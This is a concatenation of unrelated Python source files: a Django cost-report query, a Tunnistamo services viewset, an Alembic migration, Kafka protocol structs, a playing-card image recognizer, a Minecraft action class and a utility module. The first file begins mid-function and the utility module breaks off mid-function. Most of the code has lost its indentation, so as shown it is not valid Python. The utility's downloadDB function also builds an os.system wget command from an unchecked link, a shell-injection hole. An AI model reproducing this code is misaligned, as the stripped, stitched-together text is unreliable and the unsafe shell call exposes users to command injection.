units_value = sum_query.values("cost_units").first().get("cost_units", cost_units_fallback)
sum_units = {"cost_units": units_value}
if self._mapper.usage_units_key:
units_value = sum_query.values("usage_units").first().get("usage_units", usage_units_fallback)
sum_units["usage_units"] = units_value
query_sum = self.calculate_total(**sum_units)
else:
sum_units["cost_units"] = cost_units_fallback
if self._mapper.report_type_map.get("annotations", {}).get("usage_units"):
sum_units["usage_units"] = usage_units_fallback
query_sum.update(sum_units)
self._pack_data_object(query_sum, **self._mapper.PACK_DEFINITIONS)
return query_sum
def execute_query(self): # noqa: C901
"""Execute query and return provided data.
Returns:
(Dict): Dictionary response of query params, data, and total
"""
data = []
with tenant_context(self.tenant):
query = self.query_table.objects.filter(self.query_filter)
query_data = query.annotate(**self.annotations)
query_group_by = ["date"] + self._get_group_by()
query_order_by = ["-date"]
query_order_by.extend(self.order) # add implicit ordering
annotations = self._mapper.report_type_map.get("annotations")
for alias_key, alias_value in self.group_by_alias.items():
if alias_key in query_group_by:
annotations[f"{alias_key}_alias"] = F(alias_value)
query_data = query_data.values(*query_group_by).annotate(**annotations)
query_sum = self._build_sum(query)
if self._limit:
query_data = self._group_by_ranks(query, query_data)
if not self.parameters.get("order_by"):
# override implicit ordering when using ranked ordering.
query_order_by[-1] = "rank"
if self._delta:
query_data = self.add_deltas(query_data, query_sum)
is_csv_output = self.parameters.accept_type and "text/csv" in self.parameters.accept_type
def check_if_valid_date_str(date_str):
"""Check to see if a valid date has been passed in."""
import ciso8601
try:
ciso8601.parse_datetime(date_str)
except ValueError:
return False
except TypeError:
return False
return True
order_date = None
for i, param in enumerate(query_order_by):
if check_if_valid_date_str(param):
order_date = param
break
# Remove the date order by as it is not actually used for ordering
if order_date:
sort_term = self._get_group_by()[0]
query_order_by.pop(i)
filtered_query_data = []
for index in query_data:
for key, value in index.items():
if (key == "date") and (value == order_date):
filtered_query_data.append(index)
ordered_data = self.order_by(filtered_query_data, query_order_by)
order_of_interest = []
for entry in ordered_data:
order_of_interest.append(entry.get(sort_term))
# write a special order by function that iterates through the
# rest of the days in query_data and puts them in the same order
# return_query_data = []
sorted_data = [item for x in order_of_interest for item in query_data if item.get(sort_term) == x]
query_data = self.order_by(sorted_data, ["-date"])
else:
# &order_by[cost]=desc&order_by[date]=2021-08-02
query_data = self.order_by(query_data, query_order_by)
if is_csv_output:
if self._limit:
data = self._ranked_list(list(query_data))
else:
data = list(query_data)
else:
groups = copy.deepcopy(query_group_by)
groups.remove("date")
data = self._apply_group_by(list(query_data), groups)
data = self._transform_data(query_group_by, 0, data)
key_order = list(["units"] + list(annotations.keys()))
ordered_total = {total_key: query_sum[total_key] for total_key in key_order if total_key in query_sum}
ordered_total.update(query_sum)
self.query_sum = ordered_total
self.query_data = data
return self._format_query_response()
def calculate_total(self, **units):
"""Calculate aggregated totals for the query.
Args:
units (dict): The units dictionary
Returns:
(dict) The aggregated totals for the query
"""
query_group_by = ["date"] + self._get_group_by()
query = self.query_table.objects.filter(self.query_filter)
query_data = query.annotate(**self.annotations)
query_data = query_data.values(*query_group_by)
aggregates = self._mapper.report_type_map.get("aggregates")
total_query = query.aggregate(**aggregates)
for unit_key, unit_value in units.items():
total_query[unit_key] = unit_value
self._pack_data_object(total_query, **self._mapper.PACK_DEFINITIONS)
return total_query
|
from django.db.models import Exists, OuterRef
from django.db.models.functions import Greatest
from django.utils.translation import gettext_lazy as _
from django_filters import rest_framework as filters
from django_filters.widgets import BooleanWidget
from oauth2_provider.models import AccessToken
from oidc_provider.models import UserConsent
from rest_framework import serializers, viewsets
from services.models import Service
from tunnistamo.api_common import OidcTokenAuthentication, TokenAuth
from tunnistamo.pagination import DefaultPagination
from tunnistamo.utils import TranslatableSerializer
class ServiceSerializer(TranslatableSerializer):
# these are required because of TranslatableSerializer
id = serializers.IntegerField(label='ID', read_only=True)
image = serializers.ImageField(allow_null=True, max_length=100, required=False)
class Meta:
model = Service
fields = ('id', 'name', 'url', 'description', 'image')
def to_representation(self, instance):
data = super().to_representation(instance)
if hasattr(instance, 'consent_given'):
data['consent_given'] = instance.consent_given
return data
class ServiceFilter(filters.FilterSet):
consent_given = filters.Filter(
method='filter_consent_given', widget=BooleanWidget(),
help_text=_('Include only services that have or don\'t have a consent given by the current user. '
'Accepts boolean values "true" and "false".'))
class Meta:
model = Service
fields = ('consent_given',)
def filter_consent_given(self, queryset, name, value):
if 'consent_given' in queryset.query.annotations.keys():
queryset = queryset.filter(consent_given=value)
return queryset
class ServiceViewSet(viewsets.ReadOnlyModelViewSet):
"""
List services.
retrieve:
Return a service instance.
list:
Return all services.
"""
serializer_class = ServiceSerializer
queryset = Service.objects.all()
pagination_class = DefaultPagination
filterset_class = ServiceFilter
authentication_classes = (OidcTokenAuthentication,)
def get_queryset(self):
queryset = super().get_queryset()
if not self.request:
return queryset
user = self.request.user
if user.is_authenticated and isinstance(self.request.auth, TokenAuth):
token_domains = self.request.auth.scope_domains
consent_perms = token_domains.get('consents', set())
consent_read_perm_included = any('read' in perm[0] and perm[1] is None for perm in consent_perms)
if consent_read_perm_included:
user_consents = UserConsent.objects.filter(client__service=OuterRef('pk'), user=user)
user_access_tokens = AccessToken.objects.filter(application__service=OuterRef('pk'), user=user)
queryset = queryset.annotate(
consent_given=Greatest(Exists(user_consents), Exists(user_access_tokens))
)
return queryset
|
"""empty message
Revision ID: 7e8d2278b9d4
Revises: 9e057eef6196
Create Date: 2020-08-12 23:58:03.955050
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '7e8d2278b9d4'
down_revision = '9e057eef6196'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index('idx_16698_sqlite_autoindex_film_segment_1', table_name='film_segment')
op.create_unique_constraint(None, 'film_segment', ['path'])
op.alter_column('film_segment_version', 'operation_type',
existing_type=sa.SMALLINT(),
nullable=False)
op.create_index(op.f('ix_film_segment_version_end_transaction_id'), 'film_segment_version', ['end_transaction_id'], unique=False)
op.create_index(op.f('ix_film_segment_version_operation_type'), 'film_segment_version', ['operation_type'], unique=False)
op.create_index(op.f('ix_film_segment_version_transaction_id'), 'film_segment_version', ['transaction_id'], unique=False)
op.drop_index('idx_16704_ix_film_segment_version_end_transaction_id', table_name='film_segment_version')
op.drop_index('idx_16704_ix_film_segment_version_operation_type', table_name='film_segment_version')
op.drop_index('idx_16704_ix_film_segment_version_transaction_id', table_name='film_segment_version')
op.alter_column('flasklogin-users', 'created_on',
existing_type=postgresql.TIMESTAMP(timezone=True),
nullable=False)
op.alter_column('flasklogin-users', 'email',
existing_type=sa.TEXT(),
nullable=False)
op.alter_column('flasklogin-users', 'first_name',
existing_type=sa.TEXT(),
nullable=False)
op.alter_column('flasklogin-users', 'last_name',
existing_type=sa.TEXT(),
nullable=False)
op.alter_column('flasklogin-users', 'password',
existing_type=sa.TEXT(),
nullable=False)
op.alter_column('flasklogin-users', 'write_permission',
existing_type=sa.BOOLEAN(),
nullable=False)
op.drop_index('idx_16710_sqlite_autoindex_flasklogin-users_1', table_name='flasklogin-users')
op.create_unique_constraint(None, 'flasklogin-users', ['email'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'flasklogin-users', type_='unique')
op.create_index('idx_16710_sqlite_autoindex_flasklogin-users_1', 'flasklogin-users', ['email'], unique=True)
op.alter_column('flasklogin-users', 'write_permission',
existing_type=sa.BOOLEAN(),
nullable=True)
op.alter_column('flasklogin-users', 'password',
existing_type=sa.TEXT(),
nullable=True)
op.alter_column('flasklogin-users', 'last_name',
existing_type=sa.TEXT(),
nullable=True)
op.alter_column('flasklogin-users', 'first_name',
existing_type=sa.TEXT(),
nullable=True)
op.alter_column('flasklogin-users', 'email',
existing_type=sa.TEXT(),
nullable=True)
op.alter_column('flasklogin-users', 'created_on',
existing_type=postgresql.TIMESTAMP(timezone=True),
nullable=True)
op.create_index('idx_16704_ix_film_segment_version_transaction_id', 'film_segment_version', ['transaction_id'], unique=False)
op.create_index('idx_16704_ix_film_segment_version_operation_type', 'film_segment_version', ['operation_type'], unique=False)
op.create_index('idx_16704_ix_film_segment_version_end_transaction_id', 'film_segment_version', ['end_transaction_id'], unique=False)
op.drop_index(op.f('ix_film_segment_version_transaction_id'), table_name='film_segment_version')
op.drop_index(op.f('ix_film_segment_version_operation_type'), table_name='film_segment_version')
op.drop_index(op.f('ix_film_segment_version_end_transaction_id'), table_name='film_segment_version')
op.alter_column('film_segment_version', 'operation_type',
existing_type=sa.SMALLINT(),
nullable=True)
op.drop_constraint(None, 'film_segment', type_='unique')
op.create_index('idx_16698_sqlite_autoindex_film_segment_1', 'film_segment', ['path'], unique=True)
# ### end Alembic commands ###
|
# coding: utf8
from kafkaka.bstruct import (
Struct,
ShortField, IntField, CharField, UnsignedCharField,
LongLongField, UnsignedIntField, Crc32Field,
)
class KafkaProtocol(object):
PRODUCE_KEY = 0
FETCH_KEY = 1
OFFSET_KEY = 2
METADATA_KEY = 3
OFFSET_COMMIT_KEY = 8
OFFSET_FETCH_KEY = 9
CLIENT_ID = 'kafkaka'
class HeadStruct(Struct):
api_key = ShortField()
api_version = ShortField(default=0)
correlation_id = IntField()
client_id_length = ShortField(default=len(KafkaProtocol.CLIENT_ID))
client_id = CharField(default=KafkaProtocol.CLIENT_ID, length='client_id_length')
class MetaTopicStruct(Struct):
topic_name_length = ShortField()
topic_name = CharField(length='topic_name_length')
class MetaStruct(Struct):
head = HeadStruct(api_key=KafkaProtocol.METADATA_KEY)
topic_length = IntField(default=0)
topics = MetaTopicStruct(repeat='topic_length')
class BrokerStruct(Struct):
node_id = IntField()
host_char_len = ShortField()
host = CharField(length='host_char_len')
port = IntField()
class PartitionStruct(Struct):
error = ShortField()
partition = IntField()
leader = IntField()
replicas_number = IntField()
replicas = IntField(repeat='replicas_number')
isr_number = IntField()
isr = IntField(repeat='isr_number')
class TopicStruct(Struct):
error = ShortField()
topic_name_length = ShortField()
topic_name = CharField(length='topic_name_length')
partitions_number = IntField()
partitions = PartitionStruct(repeat='partitions_number')
class MetaResponseStruct(Struct):
correlation_id = IntField()
brokers_number = IntField()
brokers = BrokerStruct(repeat='brokers_number')
topics_number = IntField()
topics = TopicStruct(repeat='topics_number')
class MessageStruct(Struct):
magic = UnsignedCharField(default=0)
attributes = UnsignedCharField(default=0)
key = IntField(default=-1)
value_length = IntField()
value = CharField(length='value_length')
class Crc32MessageStruct(Struct):
crc = Crc32Field(source='message')
message = MessageStruct()
class Crc32MessageStructWithLength(Struct):
unknown = LongLongField(default=0)
message_length = IntField(source='message')
message = Crc32MessageStruct()
class MessageSetStruct(Struct):
partition = IntField()
message_set_length = IntField(source='message_set')
message_set = Crc32MessageStructWithLength(repeat='message_set_length')
class ProducePayloadStruct(Struct):
topic_name_length = ShortField()
topic_name = CharField(length='topic_name_length')
topic_payloads_number = IntField()
topic_payloads = MessageSetStruct(repeat='topic_payloads_number')
class ProduceStruct(Struct):
head = HeadStruct(KafkaProtocol.PRODUCE_KEY, 0)
acks = ShortField(default=1)
timeout = IntField(default=1000)
payloads_number = IntField()
payloads = ProducePayloadStruct(repeat='payloads_number')
class ResponsePartitionStruct(Struct):
partition = IntField()
error = ShortField()
offset = LongLongField()
class ResponseTopicStruct(Struct):
topic_name_length = ShortField()
topic_name = CharField(length='topic_name_length')
partitions_number = IntField()
partitions = ResponsePartitionStruct(repeat='partitions_number')
class ProduceResponseStruct(Struct):
correlation_id = IntField()
topics_number = IntField()
topics = ResponseTopicStruct(repeat='topics_number')
if __name__ == "__main__":
s = HeadStruct(
KafkaProtocol.METADATA_KEY,
0,
111,
)
print s.pack2bin()
s2 = HeadStruct(
KafkaProtocol.METADATA_KEY,
0,
112,
client_id='ok'
)
print s2.pack2bin()
m1 = MetaStruct(
head=dict(correlation_id=111)
)
print m1.dump2nametuple()
print m1.pack2bin()
print m1._values
m2 = MetaStruct(
head=dict(correlation_id=222)
)
print m2.pack2bin()
binary = m1.pack2bin()
m3 = MetaStruct()
print 'unpack'
m3.unpack(binary)
print m3.pack2bin()
print m3.dump2nametuple()
msg = MessageStruct(
value='test'
)
print (msg.dump2nametuple(), msg.pack2bin())
crc_msg = Crc32MessageStruct(
message=dict(
value='test'
)
)
assert crc_msg.pack2bin() == 'Y*G\x87\x00\x00\xff\xff\xff\xff\x00\x00\x00\x04test'
crc_msg_with_length = Crc32MessageStructWithLength(
message=dict(
message=dict(
value='test'
)
)
)
assert crc_msg_with_length.pack2bin() == '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12Y*G\x87\x00\x00\xff\xff\xff\xff\x00\x00\x00\x04test'
msg_set = MessageSetStruct(
partition=1,
message_set=[
dict(
message=dict(
message=dict(
value='test'
)
)
),
]
)
msg_set.pack2bin()
produce_msg = ProduceStruct(
head = dict(correlation_id=1),
payloads=[
dict(
topic_name='im-msg',
topic_payloads=[
dict(
partition=0,
message_set=[
dict(
message=dict(
message=dict(
value='test'
)
)
),
]
),
],
),
]
)
assert produce_msg.pack2bin() == '\x00\x00\x00\x00\x00\x00\x00\x01\x00\x07kafkaka\x00\x01\x00\x00\x03\xe8\x00\x00\x00\x01\x00\x06im-msg\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12Y*G\x87\x00\x00\xff\xff\xff\xff\x00\x00\x00\x04test'
out = ProduceStruct()
out.unpack(produce_msg.pack2bin())
print out.dump2nametuple()
assert out.dump2nametuple().payloads[0].topic_name == 'im-msg'
# test msgpack
import msgpack
p = msgpack.packb({'msg': 'hi', 'type': 4, 'dna': 470})
print [p]
print [ProduceStruct(
head = dict(correlation_id=1),
payloads=[
dict(
topic_name='im-msg',
topic_payloads=[
dict(
partition=0,
message_set=[
dict(
message=dict(
message=dict(
value=p
)
)
),
]
),
],
),
]
).pack2bin()]
|
import os, os.path
import cv2
import numpy as np
from config import cards, colors #card list, color names
#from config import not_a_card
#returns color -> green/red/black/blue
#checks color settings in config.py/colors{}
def color(img):
rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) #change bgr image to rgb
red = np.array([202,16,16])
green = np.array([39,132,8])
black = np.array([0,0,0])
blue = np.array([8,8,238])
color = ""
for i in rgb:
for j in i:
if (j == green).all():
color = "Green"
return colors[color]
if (j == red).all():
color = "Red"
return colors[color]
if (j == black ).all():
color = "Black"
return colors[color]
if (j == blue).all():
color = "Blue"
return colors[color]
return "0"
#takes a grayscale image and returns it as black and white [(0,0,0) or (255,255,255) pixels only]
#this is very important to make sure that close images have equal sums and lets us reduce the card list,
#so it reduces the number of operations
def black_white(pic):
    #set every non-zero pixel to 255 in one vectorized pass
    pic[pic != 0] = 255
    return pic
#When you take a card, you need to convert it to GrayScale
#Then you need to reverse the GrayScale (to make the sum much lower)
#Then you change it to black and white (all non-0 pixels set to 255) and count the sum
#Then you feed this function with sum_blackwhite (int) and blackwhite (cv2 numpy array - picture)
#Finally it returns the value of the card (defined in config.py)
def card_value(sum_blackwhite, blackwhite):
card_checked = "0"
if str(sum_blackwhite) in cards:
card_checked = cards[str(sum_blackwhite)]
        #the 6 and 9 glyphs give the same pixel sum. If pixel [row 4, col 4] is black, it's a nine!
if cards[str(sum_blackwhite)] == "6":
if (blackwhite[4,4] == [0,0,0]).all():
card_checked = "9"
#same problem with ace and 3 (seems to only happen in hand)
if cards[str(sum_blackwhite)] == "3":
if (blackwhite[13,4] == [0,0,0]).all():
card_checked = "A"
return card_checked
else:
#This one can be useful
#cv2.imwrite("cards_to_add\\%i.png" % sum_blackwhite, blackwhite)
return "0"
def card_info(card):
#convert card to numpy array
card_np = np.array(card)
#cv2 works on BGR, not RGB
img_color = cv2.cvtColor(card_np, cv2.COLOR_RGB2BGR)
#GRAYSCALE for checking card value
img_gray = cv2.cvtColor(card_np, cv2.COLOR_BGR2GRAY)
#reverse grayscale for smaller sum of pixels
img_gray_reversed = cv2.bitwise_not(img_gray)
#change reversed grayscale image to black and white
#reversed to make sum smaller (0,0,0) < (255,255,255)
blackwhite = black_white(img_gray_reversed)
#sum of black white image, this is used to check value of card
sum_blackwhite = blackwhite.sum()
#Check value
value = card_value(sum_blackwhite, blackwhite)
#Check color
info = color(img_color) + value
#return color+value
return info
from screenshot import screenshot
from config import not_a_card
def grab_card_info(card_screenshots, skip=not_a_card):
cards_boards_all = ["", "", "", "", ""]
for each_card,i in zip(card_screenshots, range(5)):
current_card = card_info(each_card)
if current_card not in skip:
cards_boards_all[i] = current_card
return cards_boards_all
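# Minimal usage sketch (assumptions: 'card.png' is a hypothetical cropped card image,
# and its pixel sum must already be listed in config.cards for a non-"0" value).
if __name__ == "__main__":
    sample_bgr = cv2.imread("card.png")
    if sample_bgr is not None:
        sample_rgb = cv2.cvtColor(sample_bgr, cv2.COLOR_BGR2RGB)  # card_info expects RGB-ordered input
        print(card_info(sample_rgb))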
|
import logging
from src.services.actions.base_action import BaseAction
from src.services.actions.mixins.pause_menu_mixin_post_1_14 import PauseMenuMixinPost_1_14
logger = logging.getLogger(__name__)
class ExitWorldPost_1_14(BaseAction, PauseMenuMixinPost_1_14):
def perform(self) -> None:
logger.info("Exiting world")
self.pause_game()
self.save_and_quit_to_title()
|
import os
import re
import cv2
import ast
import sys
import json
import time
import shutil
import pickle
import argparse
import traceback
import numpy as np
from glob import glob
from tqdm import tqdm
import subprocess as sp
from os.path import join
from pathlib import Path
from os.path import exists
from os.path import dirname
from os.path import basename
from itertools import groupby
from itertools import zip_longest
from itertools import permutations
from itertools import combinations
from collections import OrderedDict
from collections import defaultdict
from datetime import datetime as dt
try:
import yaml
except:
pass
try:
from matplotlib import pyplot as plt
except:
pass
try:
import dlib
except:
pass
try:
from PIL import Image
except:
pass
try:
import pandas as pd
pd.set_option('display.max_rows', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
except:
pass
np.set_printoptions(threshold=sys.maxsize, linewidth=sys.maxsize, formatter={'float': lambda x: "{0:8.3f}".format(x)})
class DotDict(dict):
def __init__(self, datas=None):
super().__init__()
if isinstance(datas, argparse.Namespace):
datas = vars(datas)
datas = dict() if datas is None else datas
for k, v in datas.items():
self[k] = v
def __getattr__(self, key):
if key not in self:
print("56 __getattr__ pixCommon key: ", key)
raise AttributeError(key)
else:
return self[key]
def __setattr__(self, key, val):
self[key] = val
def __repr__(self):
keys = list(self.keys())
nSpace = len(max(keys, key=lambda x: len(x))) + 2
keys = sorted(keys)
data = [f'{key:{nSpace}}: {self[key]},' for key in keys]
data = '{\n%s\n}' % '\n'.join(data)
return data
def copy(self):
return DotDict(super().copy())
def toJson(self):
res = OrderedDict()
for k, v in self.items():
try:
json.dumps({k: v})
res[k] = v
except:
res[k] = str(v)
return json.dumps(res)
def toDict(self):
res = OrderedDict()
for k, v in self.items():
try:
json.dumps({k: v})
res[k] = v
except:
res[k] = str(v)
return res
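# Minimal usage sketch for DotDict (illustrative only):
#   cfg = DotDict({"lr": 1e-3, "epochs": 10})
#   cfg.batchSize = 32            # attribute-style assignment
#   print(cfg.lr, cfg["epochs"])  # attribute- and key-style access both work
#   print(cfg.toJson())           # keys that aren't JSON-serializable are stringified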
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def readYaml(src, defaultDict=None):
if os.path.exists(src) or defaultDict is None:
with open(src, 'r') as book:
data = yaml.safe_load(book)
else:
data = defaultDict
return DotDict(data)
def writeYaml(yamlPath, jObjs):
with open(yamlPath, 'w') as book:
yaml.dump(yaml.safe_load(jObjs), book, default_flow_style=False, sort_keys=False)
def readPkl(pklPath, defaultData=None):
if not os.path.exists(pklPath):
print("loading pklPath: ", pklPath)
return defaultData
return pickle.load(open(pklPath, 'rb'))
def writePkl(pklPath, objs):
pickle.dump(objs, open(dirop(pklPath), 'wb'))
def dir2(var):
'''
list all the methods and attributes present in object
'''
for v in dir(var):
print(v)
print("34 dir2 common : ", );
quit()
# def checkAttr(obj, b, getAttr=False):
# a = set(vars(obj).keys())
# if getAttr:
# print(a)
# extra = a - a.intersection(b)
# if len(extra):
# raise Exception(extra)
def bboxLabel(img, txt="", loc=(30, 30), color=(255, 255, 255), thickness=3, txtSize=1, txtFont=cv2.QT_FONT_NORMAL, txtThickness=3, txtColor=None):
if len(loc) == 4:
x0, y0, w, h = loc
x0, y0, rw, rh = int(x0), int(y0), int(w), int(h)
cv2.rectangle(img, (x0, y0), (x0 + rw, y0 + rh), list(color), thickness)
else:
x0, y0, rw, rh = int(loc[0]), int(loc[1]), 0, 0
txt = str(txt)
if txt != "":
if txtColor is None:
txtColor = (0, 0, 0)
(w, h), baseLine = cv2.getTextSize(txt, txtFont, txtSize, txtThickness)
# baseLine -> to fit char like p,y in box
cv2.rectangle(img, (x0, y0 + rh), (x0 + w, y0 + rh - h - baseLine), color, -1)
cv2.putText(img, txt, (x0, y0 + rh - baseLine), txtFont, txtSize, txtColor, txtThickness, cv2.LINE_AA)
return img
def drawText(img, txt, loc, color=(255, 255, 255), txtSize=1, txtFont=cv2.FONT_HERSHEY_SIMPLEX, txtThickness=3, txtColor=None):
(w, h), baseLine = cv2.getTextSize(txt, txtFont, txtSize, txtThickness)
x0, y0 = int(loc[0]), int(loc[1])
if txtColor is None:
txtColor = (0, 0, 0)
cv2.rectangle(img, (x0, y0), (x0 + w, y0 - h - baseLine), color, -1)
cv2.putText(img, txt, (x0, y0 - baseLine), txtFont, txtSize, txtColor, txtThickness)
return img
def putSubImg(mainImg, subImg, loc, interpolation=cv2.INTER_CUBIC):
    '''
    place the sub image inside the main image at the given location
    '''
if len(loc) == 2:
x, y = int(loc[0]), int(loc[1])
h, w = subImg.shape[:2]
else:
x, y, w, h = int(loc[0]), int(loc[1]), int(loc[2]), int(loc[3])
subImg = cv2.resize(subImg, (w, h), interpolation=interpolation)
x, y, w, h = frameFit(mainImg, (x, y, w, h))
mainImg[y:y + h, x:x + w] = getSubImg(subImg, (0, 0, w, h))
return mainImg
def getSubImg(im1, bbox):
'''
crop sub image from the given input image and bbox
'''
x, y, w, h = bbox
x, y, w, h = int(x), int(y), int(w), int(h)
img = im1[y:y + h, x:x + w]
if img.shape[0] and img.shape[1]:
return img
def maskIt(roi, roiMask):
    '''
    apply a mask to the image; accepts both grayscale and colour images
    '''
if len(roi.shape) == 3 and len(roiMask.shape) == 2:
roiMask = cv2.cvtColor(roiMask, cv2.COLOR_GRAY2BGR)
elif len(roi.shape) == 2 and len(roiMask.shape) == 3:
roiMask = cv2.cvtColor(roiMask, cv2.COLOR_BGR2GRAY)
return cv2.bitwise_and(roi, roiMask)
def imResize(img, sizeRC=None, scaleRC=None, interpolation=cv2.INTER_LINEAR):
if sizeRC is not None:
r, c = sizeRC[:2]
else:
try:
dr, dc = scaleRC
except:
dr, dc = scaleRC, scaleRC
r, c = img.shape[:2]
r, c = r * dr, c * dc
if interpolation == 'aa':
img = np.array(Image.fromarray(img).resize((int(c), int(r)), Image.ANTIALIAS))
else:
img = cv2.resize(img, (int(c), int(r)), interpolation=interpolation)
return img
def imHconcat(imgs, sizeRC, interpolation=cv2.INTER_LINEAR):
rh, rw = sizeRC[:2]
res = []
for queryImg in imgs:
qh, qw = queryImg.shape[:2]
queryImg = cv2.resize(queryImg, (int(rw * qw / qh), int(rh)), interpolation=interpolation)
res.append(queryImg)
return cv2.hconcat(res)
def imVconcat(imgs, sizeRC, interpolation=cv2.INTER_LINEAR):
rh, rw = sizeRC[:2]
res = []
for queryImg in imgs:
qh, qw = queryImg.shape[:2]
queryImg = cv2.resize(queryImg, (int(rw), int(rh * qh / qw)), interpolation=interpolation)
res.append(queryImg)
return cv2.vconcat(res)
class VideoWrtier:
"""mjpg xvid mp4v"""
def __init__(self, path, camFps, size=None, codec='mp4v'):
self.path = path
try:
self.fps = camFps.get(cv2.CAP_PROP_FPS)
except:
self.fps = camFps
self.__vWriter = None
self.__size = size
self.__codec = cv2.VideoWriter_fourcc(*(codec.upper()))
print("writing :", path, '@', self.fps, 'fps')
def write(self, img):
if self.__vWriter is None:
if self.__size is None:
self.__size = tuple(img.shape[:2])
self.__vWriter = cv2.VideoWriter(self.path, self.__codec, self.fps, self.__size[::-1])
if tuple(img.shape[:2]) != self.__size:
img = cv2.resize(img, self.__size)
if len(img.shape) == 2:
img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
self.__vWriter.write(img)
def close(self):
self.__vWriter.release()
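# Hedged usage sketch (file name and fps are illustrative): the writer lazily
# creates the underlying cv2.VideoWriter from the first frame's size, resizes
# later frames to match, and converts grayscale frames to BGR before writing.
#
#   writer = VideoWrtier("out.mp4", camFps=30, codec='mp4v')
#   for frame in frames:        # frames: iterable of HxW or HxWx3 uint8 arrays
#       writer.write(frame)
#   writer.close()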
class clk:
def __init__(self):
self.tik = dt.now()
self.__lapse = 0
def tok(self, reset=True):
lapse = dt.now() - self.tik
self.__lapse = lapse.seconds + (lapse.microseconds / 1000000)
if reset:
self.tik = dt.now()
return self
def fps(self, nFrames, roundBy=4):
lapse = nFrames / self.__lapse
# self.__lapse = 0
return round(lapse, roundBy) if roundBy else int(lapse)
def __repr__(self):
lapse = self.__lapse
# self.__lapse = 0
return str(round(lapse, 4))
def sec(self, roundBy=4):
lapse = self.__lapse
# self.__lapse = 0
return round(lapse, roundBy) if roundBy else int(lapse)
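# Hedged usage sketch (run_some_work is a placeholder): clk measures wall-clock
# intervals with datetime; tok() records the elapsed time and optionally resets.
#
#   timer = clk()
#   run_some_work()
#   print(timer.tok().sec())         # seconds elapsed since construction/last tok
#   print(timer.tok().fps(nFrames))  # frames per second over the latest interval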
# class Clock:
# def __init__(self):
# self.__lapse = 0
# self.__tik = dt.now()
# self.__cycle = 0
#
# def tik(self):
# self.__tik = dt.now()
#
# def tok(self, reset=True):
# lapse = dt.now() - self.__tik
# lapse = lapse.seconds + (lapse.microseconds / 1000000)
# self.__lapse += lapse
# self.__cycle += 1
# return f'{round(lapse, 4)} {self.__cycle}'
#
# def __repr__(self):
# lapse = self.__lapse / self.__cycle
# return f'{round(lapse, 4)} {round(1 / lapse, 4)}'
class Wait:
def __init__(self):
self.pause = False
def __call__(self, delay=1):
if self.pause:
delay = 0
key = cv2.waitKey(delay)
if key == 32:
self.pause = True
if key == 13:
self.pause = False
return key
__wait = Wait()
def showImg(winname='output', imC=None, delay=None, windowConfig=0, nRow=None, chFirst=False):
winname = str(winname)
if imC is not None:
if type(imC) is not list:
imC = [imC]
imC = photoframe(imC, nRow=nRow, chFirst=chFirst)
cv2.namedWindow(winname, windowConfig)
cv2.imshow(winname, imC)
if delay is not None:
key = __wait(delay)
return key
return imC
def pshowImg(winname=None, imC=None, delay=0):
winname = str(winname)
if imC is not None:
if type(imC) is list:
pass
plt.imshow(imC)
if delay is not None:
if delay == 0:
plt.show()
# else:
# plt.pause(delay / 1000)
return 1
return imC
def str2path(*dirpath):
dirpath = list(map(str, dirpath))
path = join(*dirpath)
if path.startswith('home/ec2-user'):
path = join('/', path)
return path
def moveCopy(src, des, op, isFile, remove):
des = str2path(des)
if isFile and not os.path.splitext(des)[-1]:
raise Exception(f'''Fail des: {des}
should be file''')
if not remove and exists(des):
raise Exception(f'''Fail des: {des}
already exists delete it before operation''')
if isFile:
if remove and exists(des):
os.remove(des)
mkpath = dirname(des)
if not exists(mkpath):
os.makedirs(mkpath)
else:
if remove and exists(des):
shutil.rmtree(des, ignore_errors=True)
return op(src, des)
def dirop(*dirpath, **kw):
mkdir, remove, mode = kw.get('mkdir', True), kw.get('remove'), kw.get('mode', 0o777)
copyTo, moveTo = kw.get('copyTo'), kw.get('moveTo')
path = str2path(*dirpath)
isFile = os.path.splitext(path)[-1]
if copyTo or moveTo:
if not exists(path):
raise Exception(f'''Fail src: {path}
not found''')
elif remove is True and exists(path):
if isFile:
os.remove(path)
else:
shutil.rmtree(path, ignore_errors=True)
mkpath = dirname(path) if isFile else path
if mkdir and not exists(mkpath) and mkpath:
os.makedirs(mkpath)
if copyTo:
copy = shutil.copy if isFile else shutil.copytree
path = moveCopy(path, copyTo, copy, isFile, remove=remove)
elif moveTo:
path = moveCopy(path, moveTo, shutil.move, isFile, remove=remove)
return path
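# Hedged usage sketch (paths are illustrative): dirop joins its positional
# arguments into a path, creates the parent directory (or the directory itself
# for folder paths), and can optionally remove, copy, or move the target.
#
#   dirop('/tmp/exp', 'run1', 'log.txt')    # ensures /tmp/exp/run1 exists, returns the file path
#   dirop('/tmp/exp/run1', remove=True)     # deletes and recreates the folder
#   dirop('/tmp/exp/run1/log.txt', copyTo='/tmp/bk/log.txt', remove=True)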
def downloadDB(link, des, remove=False):
dirop(des)
os.system(f'cd {des};wget -nd -c "{link}"')
unzipIt(join(des, basename(link)), des, remove=remove)
def zipIt(src, desZip, remove=False):
if not exists(src):
raise Exception(f'''Fail src: {src} \n\tnot found''')
if exists(desZip):
if remove:
os.remove(desZip)
else:
raise Exception(f'''Fail des: {desZip} \n\talready exists delete it before operation''')
desZip, zipExt = os.path.splitext(desZip)
if os.path.isfile(src):
tempDir = join(dirname(src), getTimeStamp())
if os.path.exists(tempDir):
raise Exception(f'''Fail tempDir: {tempDir} \n\talready exists delete it before operation''')
os.makedirs(tempDir)
shutil.copy(src, tempDir)
desZip = shutil.make_archive(desZip, zipExt[1:], tempDir)
shutil.rmtree(tempDir, ignore_errors=True)
else:
desZip = shutil.make_archive(desZip, zipExt[1:], src)
return desZip
def unzipIt(src, desDir, remove=False):
if not exists(src):
raise Exception(f'''Fail src: {src} \n\tnot found''')
